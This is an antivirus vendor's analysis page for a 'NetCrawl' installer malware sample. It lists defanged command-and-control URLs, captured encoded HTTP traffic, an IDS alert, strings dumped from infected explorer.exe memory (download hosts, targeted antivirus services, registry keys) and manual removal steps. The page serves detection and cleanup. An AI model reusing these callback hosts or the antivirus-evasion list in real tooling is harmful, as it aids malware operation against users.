hxxp://netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo=
hxxp://install.netcrawl.info/ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= 8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== 8.34.112.26
hxxp://install.netcrawl.info/fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR 8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y 8.34.112.26
hxxp://install.netcrawl.info/mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== 8.34.112.26


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

Traffic

GET /mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== HTTP/1.1
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 184148
QHKPEGQYa9RZFEVHsmw7VyrLGGsVZdAHLyRF2UByTz/BQihVW51sGDpL8HEnAHbKFFwYFu
sAXQ03nhkwBny6bEN8YtEeJEBy3EBPbS sbGxcK9UdJEQikiwxZVjYBh4Xf5ZTcx9QyjpW
XiLFSXdPMfQUXBlCtGF CSeFXngTdq9TRzJilE82VnHbQSM2JKgiJVdymxRwBySefm5yXs
gHNVpowV81BwSHbhZQdNpWYA5umD1jPHnzDjQcJZoUYE81kHlxSgWwYA5ia9tXZGI2iiE4
RizWHVsDM7YAJ2NeywsrE2C/ahVAW88QSAgijwRzTTjPEGYRWbQALAIxghBuV3K7UEd9NJ
hYBEBy3EAjNiy8IjoefN8eegUipD0gb1rYISATcIgUa0Nf0yVfXiLKVWFbO8gRCkpSsE5l
CWjMGToUdLcCGGoyiFkvDWWLTGUuePB ehAqwAFtRH3IFB9Ve59OagZyl15zHxzsL0kbbt
dDd0I11gZ0LGSjTXUJN51cDxp5qlRNbGLRHiRActxAT20vrGxsXCvVHSREIpIsMWVY2AYe
F3 WU3MfUMo6Vl4ixUl3TzH0FFwZQrRhfgknhV54E3avU0cyYpRPNlZx20EjNiSoIiVXcp
sUcAcknn5ucl7IBzVaaMFfNQcEhmcWUHTaVmAObpg9YyNj8w40HCWaFGBPNZBZUXcuiVkg
T3/FVl1QEb08P1w5ylMkRDGLMCFjYtwPLVQpjUM9SRKdM0ICZcBSYEgC2xldFRbrTGMAKM
JeJBploEVsfzSUSjdidsxGai54ry86QTuVU2EVI50zJmIOhwQpGmCGGnNARt41TlA611Rw
SSmWDgoZUPMYL15ozAg7BXLhGgBWC65rcA082UR1ZGDzbAVLLdAffAM1hD04dXDhIz0CfL
FDP1Yck3RME2zWQ0tNOd9XEh5BvU46TiGWDCcWY6ZEdH8siFlwG3DcSW0gYK8hJFE79xB8
DzGPHzxjT9ZAchByj0U0CRzWJV4Fb9FCJxYy2xlbFRjzR24NJ5peeAFltkVfMjvfVTYDJJ
AWLS42sD4zEGSbOUM1EMhwdnZNyQpqTDGwTyJMUMszSBxhz1VZcATIGks0QbxSNEBmmB0u
AHKNQU97YsdSJ01yhQdkdDKsLSJXOu8QZBMiyGY6c0DRTmoQfJFVNGtfyz9MF0PLQ2ZHdo
ATSRxHtA40BTeKCy0Hc EaRH8sjll A3vRRGJ4YPM6JEc7xF1zRC6Ofm4/GJFAPA9jhhRr
B3b0BW1QLIFWZFg8mE8KPV2yUHkfK4gIHilAqk5GcTeOYA5ia9tXZGI2nyskQTfWH1Q6Eo
Q1OnVY3A4kKk iWCVMctAxXRdygQonWjXWAE0 VbxHNFYqmxAuWTWmWFJ7I4lZNnd/xVBk
LninOzpecpsXZxQkjxI1ckXLBwsedoBdcx9Y3jpJFyyBT3ZII9UHTFIOt0N6HyHCXicNdq
BUACQ0j0k3XDLSB2hoYPN3bh58zQh4A2XQfhxNf pAZFRjgkI5BwSdJUMBdNRDZEcI
<<< skipped >>>

POST /mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== HTTP/1.1


Content-Length: 246
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive

alpha=bCJoDyADD08zBl9NRyUvU2sqHCUyMWwzYBcyPwlPKCJzRTN6CWUMTmpmAn0FNyloXVplSQJ8ZXg5S1Y2a2oTDiIAJi9mLj8MfANjQ3tKbCIuPm5efHonIHMgGkx3TTxqcykZJTledXlObmB0CXEwNG1aXHoNRQA7MzJkAjtpdx4PJQgiIxlQSXR7D39hVgg8ZCM9eAsiKSo8ZXFcQWNNIGtzNgUkOFx0cUZqGz1uMBcgLg==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0



GET /mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 2004
aNEaHLo37W9O8F qJ2Dlf4leFLU9xkUL8QzmTEysZohaGPt07U943njrfWaWJtsNCZcs/2
YU6he KCTZEOgKb4lEkQ1e ErSUl2tS40PJ/xGoV8YpDiNHDX5ctNsC/Mu9gRArSG/XDuI
L8Z4S7Zh1RUXgzT7aAytPJceE g40ABNkEOGSgrifNFQBf1Cji4h7VScWBSgK6cXNelFrR
II9zLDExatZO5OLYsoxxQQvWWbXBzaevI8T6swxUEE7ijRKwCHFIoMErYwjRALq12ROWCy
OLVnLoFsyF0g61rnClS0DckFU F5 Fg0hTbQanaLdphMHIUrtwlBpi2TFAK cZYgTZBDhi
ZR4WyfBkeqSI1wYO1ijUkeoiuAKTHmW oKVPgr3BoWrWvyWDmBFMJCQ61htEcclTO1fkip
KJQeXL40xzJbk0SHSgrqaNFPTPMGhCQj627fFgmkO4ECfPEM5kxMrGeBWhj7dO1PeN5463
15jCbbDQmXLP9mFOoXnggZ8inRJEKdWpA0bN99z1VHuFfDcGD e5FZGJgviRpysED6RAK6
fNUOSupu6U8 sjvPQ0/5PplaFZp0tSJBuieCNRHoNMIzb5RTgAMStm/cUFq6CMM1Mextkl
4Z9HSCHjz5S6MKC 4/0wIYtXnvXz ZdtgUQ78mzRZL2nrjPV6tZt1ZONcO43QA3kaCHFiu
M59vUKxNjygn nScQA6KEqUKJOV8 kYdtHKSAFvjePhkO4k/gQxErmibA1uTIOchTbwhgy
0R8CjRdBaSQ48EHK5v0k5KumqAKCv f75EGLUlxkU260L8TUK0N8MSTeB/ QhggjvPRU/3
JpJXGJUstX5aujGCBlznf90yDsYP0EQS HDNWQvlBqkXEd840Q4NtzqMXWqoffZbB/gq1Q
RU7mHudga0KMxVbq5phw1V1C72KFutCoYWFb5n2iNAkBrBDUj8bN5ITLtygDA37TjHQgi6
IshdNuVc7E0g9yrZAF/MZfhJMcZgxVdGqGHbDRCFPOArXKxm3R0R8C7Reg6ZToILRK4zyU
5culnNJ2Dhft8WROJixgsp kutEkzeFeMhGKMv7UsujHiZFGeyZ4VACpk 4xhyny2JHx/r
LugKb4lEkQ1e F/YTlq2S48AHt10lEIOoi IEwzWb FcB9ox1xFf/S xCCyFNtZTZLppkg
1DmC37KALqIZ8LFf8p0TJ6nVqWDRK2Z8hQRfMGhzMw63 zTQm/OIE8OO9N5ApU8D/cBV j
L/RZPpM10VII4WKWQwqTdLUhVqknk1lK6C/BM1HQTcEBVK4zjAwb8waVJTLtOMcONZ0ds1
18qF7uXAa0ZJI7U x/8lk1gi7/an2yapNADoUEywdbujaCFQTKOMYlRZNYvzRl4mDTT12 
SI0AHt9zj0kOvi WFHKmDPlJAuM7/hdX6i nRC INo8UT6N0kkwNkzzBJUK9IcVBHukx2H
oOmlmRC1XCaMlVX7pniTkh4zjHShy6PYFTcuNd618B5DqSTFzuYe5PdsY/21dJrybN
<<< skipped >>>

GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..
Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-As
pNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP=
"CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:39:20 GMT..Content-Length: 0.
.....


GET /ii?alpha=cB8wD2sVS28rRB0vHyVkcVtjAmtwQzwnZl8yJB4uIkN6SC5lbk4sQQEffU5mOlBzD1UJPVMPKW0df1N7a0tPER8eGXoTZTcaZQd/XXAfIn9xVDsrN2IcEwcfAWw3SnF/U2hoaS1+QnwFcEArCE4uDzAvH3IbXAQ/MV9sUGszR04PHBoDchVzIEA4CD4IF0Zpf2ZWYCx1ORc8JiNGLW0PImAaOU8cZzxWdANsXTILMywJK18ScWtIWnwzZT4AcBApWlBeWlQyRmBGGnheYUtcWnFqMB5kB3NwRSY1PkR8TxQkNBEvRjhhc1cgWyYCa0oqRGklOlUvPwtOajVGPwIhZQwZTV5HQiwDZzFGOAsgDhlGYXlxVnQYbjVPdTM6VSoiR2d1UGwPMWY/YSdSfyhyXmZ1Sm1KDxU3B0l8OAkCFywxHw8WC0Bbfxd7f0FmB3caTgBsYDIfN141cEc0fmsGezI+fXRHZm8aL2Y1c3QGS3hNN0p0cgtVJXk4VGsoXDAPbQw+OR9lT18mAxljGmBfKFlBFWxoJEk7XzU/MjlFMRo= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 84
gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c
9 nNODAqYod5NuHTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Prag
ma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Se
rver: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-
Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Sun, 20 Sep 2015 01:
39:20 GMT..Content-Length: 84..gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnC
ClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5Nu....







The Virus connects to the servers at the folowing location(s):







Explorer.EXE_532_rwx_01E00000_00002000:




SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text

Explorer.EXE_532_rwx_01E10000_00001000:




|explorer.exeM_532_

Explorer.EXE_532_rwx_038F0000_0108E000:




c:\windows
hXXp://erenkarahan.com/images/logo.gif
hXXp://gutekpl.za.pl/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://igorfomin.ru/logo.gif
hXXp://m2comunicacion.com/images/logo.gif
hXXp://leenaenterprises.com/img/logo.gif
hXXp://VVV.geriatriasinop.com.br/img/button.gif
hXXp://britishmotors.it/logo.gif
hXXp://artroom.com.tr/blog/logo.gif
hXXp://gammaconseil.fr/images/button.gif
hXXp://xexylia.com/logo.gif
%System%\drivers\olitq.sys
8317508876
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
KERNEL32.dll
USER32.dll
h.rdata
H.data
.reloc
ntoskrnl.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
ipfltdrv.sys
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\amsint32
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
A2CMD.
ASHWEBSV.
AVGCC.AVGCHSVX.
DRWEB
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBSCANX.
.adata
M_%d_
%c%d_%d
?456789:;<=
!"#$%&'()* ,-./0123
GetProcessHeap
GetWindowsDirectoryA
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
&3&3&3&389
.rdata
.data
rnl.exe?
= =$=(=,=0=4=8=<=@
rv:1.9.2.3)
.NEtCLR
.klkjw:9fqwiBu
f3a.sysB
D6c.pBTab
drfig%s:*:
0}.T&?%x=
~UrlA'W
\'Web%
HTTP)s'PJ
o.ENHCD
KPCKwWEBWUPD
>*?456789:;<=
!"#$%&'()* ,-./01230 0
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
WS2_32.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:652
    NetCrawl.mg.exe:1964
    

    2. 

  2. Delete the original Virus file.
    3. 

  3. Delete or disinfect the following files created/modified by the Virus:
    

    %WinDir%\system.ini (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now